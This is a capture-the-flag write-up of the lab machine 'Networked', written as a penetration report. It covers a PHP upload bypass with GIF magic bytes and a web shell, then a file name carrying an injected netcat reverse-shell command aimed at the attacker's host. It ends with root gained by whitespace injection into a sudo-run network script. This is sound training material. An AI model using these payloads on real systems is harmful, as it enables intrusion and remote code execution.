✅Networked (Easy)

Lesson Learn

Report-Penetration

Vulnerable Exploit: Improper validate filter

System Vulnerable: 10.10.10.146

Vulnerability Explanation: The machine doesn't proper restrict access to sensitive information which could allow us to download the source code and bypass file upload with reverse shell and lead to command execution and gain access on the machine.

Privilege Escalation Vulnerability: Insufficient Input validation

Vulnerability Fix: Restrict Access to Sensitive Information

Severity: High

Step to Compromise the Host:

Reconnaissance

└─$ nmap -p- -sC -sV -T4 10.10.10.146    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-21 09:09 EST
Stats: 0:07:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 46.79% done; ETC: 09:26 (0:09:05 remaining)
Stats: 0:12:49 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 89.63% done; ETC: 09:23 (0:01:29 remaining)
Nmap scan report for 10.10.10.146
Host is up (0.84s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Enumeration

Port 80 Apache/2.4.6

Going through the port 80, we found a message on the webpage. By checking on source code, we found some comments.

Let find hidden directory with gobuster.

└─$ gobuster dir -u http://10.10.10.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .php   
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.146
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/11/21 09:24:21 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 229]
/uploads              (Status: 301) [Size: 236] [--> http://10.10.10.146/uploads/]
/photos.php           (Status: 200) [Size: 1302]                                  
/upload.php           (Status: 200) [Size: 169]                                   
/lib.php              (Status: 200) [Size: 0]                                     
/backup               (Status: 301) [Size: 235] [--> http://10.10.10.146/backup/]

Browsing on /upload.php, there is an upload options which we could verify if we can upload .php

Checking on /photo.php, we can see some images and source code, the images are in /uploads.

Checking on /backup we found a file backup.tar. We can download the backup file and extract.

└─$ tar xfv backup.tar                                                                                                                                                                    2 ⨯
index.php
lib.php
photos.php
upload.php

Checking on upload.php file, it configured to filter the image upload with some extension.

We can bypass the filter by use magic bytes.

└─$ echo "GIF8; testing" > test.php
                                                                                                                                                                            
└─$ file test.php   
test.php: GIF image data 25972 x 29811

Exploitation

Let write script to take cmd argument and execute.

└─$ cat shell.php.gif 
GIF8;
<?php system($_REQUEST['cmd']); ?>

We can upload our php shell script to the application.

By going through the shell we have upload, we can get code execution.

Then, we can send this to burp proxy and replace with bash reverse shell.

Privilege Escalation

Shell as guly

Now we are on the machine but we don't have privilege on user guly. Let enumerate on the script.

bash-4.2$ ls
check_attack.php  crontab.guly  user.txt

bash-4.2$ cat check_attack.php 
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

bash-4.2$ cat crontab.guly 
*/3 * * * * php /home/guly/check_attack.php

Base on cron job, the php script will run every 3minutes.

bash-4.2$ cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

The check_attack.php is going to check every 3 minutes, if there is any invalid ip address or files on the machine, it will create file /tmp/attack.log and pass it to exec() function to delete it.

We can create a suspicious file which could trigger to the check_attack.php script and it will past it to exec() function to remote it.

Go to /var/www/html/uploads and create a file as netcat reverse shell. For the file we can not use / symbol. So, with netcat -c options we can get the bash shell.

bash-4.2$ touch '; nc -c bash 10.10.14.31 5555'

Let start our netcat listener on port 5555. Wait for 3mns, the shell pop up as guly user.

nc -lvp 5555

Shell as root

Auto script bash

First thing first, I will run sudo -l to check misconfigure file.

[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh

[guly@networked ~]$ cat /usr/local/sbin/changename.sh 
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
  
/sbin/ifup guly0

One we run the files, it requires to input some data. Viewing the file it contains data we filled.

[guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-guly
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
NAME=sa
PROXY_METHOD=a
BROWSER_ONLY=a
BOOTPROTO=a

Reference: https://book.hacktricks.xyz/linux-unix/privilege-escalation

The NAME= attributed in these network scripts is not handled correctly. If you have white/blank space in the name the system tries to execute the part after the white/blank space. Which means; everything after the first blank space is executed as root.

[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
test bash
interface PROXY_METHOD:
test
interface BROWSER_ONLY:
test
interface BOOTPROTO:
test
[root@networked network-scripts]# whoami
root
<ipts]# cat /etc/sysconfig/network-scripts/ifcfg-guly                        
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
NAME=test bash
PROXY_METHOD=test
BROWSER_ONLY=test
BOOTPROTO=test
[root@networked network-scripts]#